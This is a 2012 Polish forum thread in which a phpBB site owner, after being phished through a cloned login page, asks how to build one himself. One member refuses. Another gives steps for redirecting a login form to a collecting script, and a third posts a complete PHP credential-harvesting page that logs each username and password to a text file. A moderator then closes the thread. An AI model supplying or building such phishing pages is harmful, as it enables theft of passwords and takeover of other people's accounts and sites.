[Q] jak zrobić to co on ?

smooth killer · 15 Października 2012

Witam,

mam swoją stronę z PHPBB, i raz mi pewien ktoś napisał taką wiadomość żebym tam mu pomógł (dał link do "mojej" strony tyle że to był kod url i tylko wyświetlało że to moja strona, a przekierowanie było na inną)

Po przekierowaniu był ten sam styl, logo, teksty itd.Wyskoczył panel logowania (wpisałem nazwe i hasło z mojej strony) i na drugi dzień mi gościu wszystko z forum wyczyścił ?

Jak takie coś zrobić ? Gdzie jest zapisywane kto co tam wpisał (nawet jeśli było źle) i dodam że tam był taki sam styl ale jedyną działającą zakładką było login, inne przekierowywały na strone hosta że błąd jest.

Paradisia · 15 Października 2012

,,Nie rozumieć twojej mądrości"

PHPBB to jest forum, to po pierwsze.

Otóż gościu zrobił Cię w balona ;-) Zrobił inne forum, a podmienił skrypt logowania na taki, że wszystko co tam wpiszesz idzie mu prosto np. na skrzynkę e-mail

Wszedł na twoje forum do panelu administratora i wszystko wyczyścił ;-)

smooth killer · 15 Października 2012

Wiem o tym właśnie !

Chodzi mi właśnie o to jak takie coś zrobić.Zna ktoś taki skrypt co by własnie to co się wpisuje w polach login i hasło zapisało np w pliku na ftp lub wysłało mi na maila ?

cxxus · 15 Października 2012

Nie pomagamy w czymś takim, dziękuje dobranoc.

Paradisia · 15 Października 2012

Ja pomogę, ale nie dla oszustwa tylko czysto naukowo. Jednakże zatwierdzam, iż nie biorę odpowiedzialności na skutki.

Otóż bierzemy sobie skrypt logowania na forum Potem tylko tam gdzie masz <inpu type="text" name"login> czy jakoś tak i tam masz potem <inpu type= submit value="Wpisz swój login" piszę to z pamięci więc nie jestem pewny to na górze masz opcję wysyłania gdzieś POST albo GET i właśnie tam gdzie to pisze mamy odnośnik do wysyłania.

Tworzymy sobie pusty skrypt np. hasla.php i tam gdzie mamy obok GET, albo POST ( zakładam że będzie na pewno GET ponieważ w adresie hasła nie wyświetla hasła).

Dajemy adres wysyłania /hasla.php i w po tym wszystko co on napisał jest w skrypcie hasla.php .

Przepraszam za ortografię, ale piszę z telefonu

RydeR_PL · 15 Października 2012

lub gotowy skrypt:

<?

if(empty($_POST['login']) && empty($_POST['haslo'])) {

echo'
<form method="POST">
<input type="text" name="login" placeholder=" login">
<input type="text" name="haslo" placeholder=" haslo">
<input type="submit" value="zaloguj sie">
</form>
';

}

else {

$dane = '
Login: ' .$_POST['login']. '  Haslo: ' .$_POST['haslo']. '
';

file_put_contents("dane.txt", $dane , FILE_APPEND);

echo 'zostales zalogowany!';

}

?>

Konfitura · 16 Października 2012

MPC nie popiera kradzieży, tak jak napisał cxxus. Zamykam + kosz.

Zaloguj się

👋 Witaj na MPCForum!

[Q] jak zrobić to co on ?

Rekomendowane odpowiedzi

smooth killer

smooth killer

Paradisia

Paradisia

smooth killer

smooth killer

cxxus

cxxus

Paradisia

Paradisia

RydeR_PL

RydeR_PL

Konfitura

Konfitura

Zarchiwizowany